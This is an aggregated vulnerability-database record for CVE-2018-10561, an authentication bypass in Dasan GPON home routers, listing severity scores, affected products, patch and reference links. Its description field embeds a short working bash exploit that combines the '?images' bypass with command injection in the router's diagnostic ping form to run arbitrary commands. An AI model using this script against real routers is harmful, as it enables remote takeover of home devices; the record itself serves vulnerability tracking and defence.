ID

VAR-201805-0262


CVE

CVE-2018-10561


TITLE

Dasan GPON home router Authentication vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-004885

DESCRIPTION

An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash echo "[+] Sending the Commanda| " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga

Trust: 2.7

sources: NVD: CVE-2018-10561 // JVNDB: JVNDB-2018-004885 // CNVD: CNVD-2018-09230 // BID: 107053 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // PACKETSTORM: 147482

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-09230

AFFECTED PRODUCTS

vendor:dasannetworksmodel:gpon routerscope:eqversion: -

Trust: 1.6

vendor:dasanmodel:gpon routersscope: - version: -

Trust: 0.8

vendor:dasanmodel:networks gponscope: - version: -

Trust: 0.6

vendor:dasanmodel:networks gpon routerscope:eqversion:0

Trust: 0.3

sources: CNVD: CNVD-2018-09230 // BID: 107053 // JVNDB: JVNDB-2018-004885 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-10561
value: CRITICAL

Trust: 1.0

NVD: CVE-2018-10561
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-09230
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201805-189
value: CRITICAL

Trust: 0.6

VULHUB: VHN-120333
value: HIGH

Trust: 0.1

VULMON: CVE-2018-10561
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2018-10561
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-09230
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-120333
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-10561
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-09230 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // JVNDB: JVNDB-2018-004885 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.9

sources: VULHUB: VHN-120333 // JVNDB: JVNDB-2018-004885 // NVD: CVE-2018-10561

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201805-189

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-201805-189

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-004885

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-120333 // VULMON: CVE-2018-10561

PATCH

title:Top Pageurl:http://www.dasannetworks.com/en/

Trust: 0.8

title:GPONHomeRouters security bypass vulnerability patchurl:https://www.cnvd.org.cn/patchInfo/show/128597

Trust: 0.6

title:Dasan GPON Home router security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79885

Trust: 0.6

title:Brocade Security Advisories: BSA-2018-603url:https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories&qid=b192ae1777abead866cbeb7d8a56bb12

Trust: 0.1

title:GPONurl:https://github.com/manyunya/GPON

Trust: 0.1

title:GPONurl:https://github.com/ethicalhackeragnidhra/GPON

Trust: 0.1

title:CVE-2018-10562url:https://github.com/ATpiu/CVE-2018-10562

Trust: 0.1

title:GPON-home-routers-Exploiturl:https://github.com/vhackor/GPON-home-routers-Exploit

Trust: 0.1

title:GPONurl:https://github.com/f3d0x0/GPON

Trust: 0.1

title:GPONurl:https://github.com/Truongnn92/GPON

Trust: 0.1

title:underattack-pyurl:https://github.com/underattack-today/underattack-py

Trust: 0.1

title:Sniperurl:https://github.com/samba234/Sniper

Trust: 0.1

title:Kn0ckurl:https://github.com/telnet22/Kn0ck

Trust: 0.1

title:Sn1perurl:https://github.com/unusualwork/Sn1per

Trust: 0.1

title:Sn1perurl:https://github.com/oneplus-x/Sn1per

Trust: 0.1

title:api.greynoise.iourl:https://github.com/GreyNoise-Intelligence/api.greynoise.io

Trust: 0.1

title:Exp101tsArchiv30thersurl:https://github.com/nu11secur1ty/Exp101tsArchiv30thers

Trust: 0.1

title:awesome-cve-poc_qazbnm456url:https://github.com/xbl3/awesome-cve-poc_qazbnm456

Trust: 0.1

title:PoC-in-GitHuburl:https://github.com/hectorgie/PoC-in-GitHub

Trust: 0.1

title:CVE-POCurl:https://github.com/0xT11/CVE-POC

Trust: 0.1

title:PoC-in-GitHuburl:https://github.com/nomi-sec/PoC-in-GitHub

Trust: 0.1

title:Threatposturl:https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/

Trust: 0.1

title:Threatposturl:https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/

Trust: 0.1

title:Threatposturl:https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/

Trust: 0.1

title:Threatposturl:https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/

Trust: 0.1

title:BleepingComputerurl:https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/

Trust: 0.1

title:Threatposturl:https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/

Trust: 0.1

sources: CNVD: CNVD-2018-09230 // VULMON: CVE-2018-10561 // JVNDB: JVNDB-2018-004885 // CNNVD: CNNVD-201805-189

EXTERNAL IDS

db:NVDid:CVE-2018-10561

Trust: 3.6

db:EXPLOIT-DBid:44576

Trust: 3.2

db:BIDid:107053

Trust: 2.1

db:JVNDBid:JVNDB-2018-004885

Trust: 0.8

db:EXPLOITDBid:44576

Trust: 0.6

db:CNVDid:CNVD-2018-09230

Trust: 0.6

db:CNNVDid:CNNVD-201805-189

Trust: 0.6

db:PACKETSTORMid:147482

Trust: 0.2

db:VULHUBid:VHN-120333

Trust: 0.1

db:VULMONid:CVE-2018-10561

Trust: 0.1

sources: CNVD: CNVD-2018-09230 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // BID: 107053 // JVNDB: JVNDB-2018-004885 // PACKETSTORM: 147482 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

REFERENCES

url:https://www.exploit-db.com/exploits/44576/

Trust: 3.3

url:http://www.securityfocus.com/bid/107053

Trust: 2.5

url:https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/

Trust: 2.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10561

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10561

Trust: 0.8

url:http://www.dasannetworks.com/en/

Trust: 0.3

url:https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603

Trust: 0.3

url:https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/287.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/manyunya/gpon

Trust: 0.1

url:https://github.com/atpiu/cve-2018-10562

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10562

Trust: 0.1

sources: CNVD: CNVD-2018-09230 // VULHUB: VHN-120333 // VULMON: CVE-2018-10561 // BID: 107053 // JVNDB: JVNDB-2018-004885 // PACKETSTORM: 147482 // CNNVD: CNNVD-201805-189 // NVD: CVE-2018-10561

CREDITS

None

Trust: 0.9

sources: BID: 107053 // CNNVD: CNNVD-201805-189

SOURCES

db:CNVDid:CNVD-2018-09230
db:VULHUBid:VHN-120333
db:VULMONid:CVE-2018-10561
db:BIDid:107053
db:JVNDBid:JVNDB-2018-004885
db:PACKETSTORMid:147482
db:CNNVDid:CNNVD-201805-189
db:NVDid:CVE-2018-10561

LAST UPDATE DATE

2024-11-23T22:00:31.436000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2018-09230date:2018-05-10T00:00:00
db:VULHUBid:VHN-120333date:2019-03-04T00:00:00
db:VULMONid:CVE-2018-10561date:2019-03-04T00:00:00
db:BIDid:107053date:2019-02-18T00:00:00
db:JVNDBid:JVNDB-2018-004885date:2018-06-29T00:00:00
db:CNNVDid:CNNVD-201805-189date:2019-02-25T00:00:00
db:NVDid:CVE-2018-10561date:2024-11-21T03:41:33.423

SOURCES RELEASE DATE

db:CNVDid:CNVD-2018-09230date:2018-05-10T00:00:00
db:VULHUBid:VHN-120333date:2018-05-04T00:00:00
db:VULMONid:CVE-2018-10561date:2018-05-04T00:00:00
db:BIDid:107053date:2019-02-18T00:00:00
db:JVNDBid:JVNDB-2018-004885date:2018-06-29T00:00:00
db:PACKETSTORMid:147482date:2018-05-04T00:32:22
db:CNNVDid:CNNVD-201805-189date:2018-05-07T00:00:00
db:NVDid:CVE-2018-10561date:2018-05-04T03:29:00.227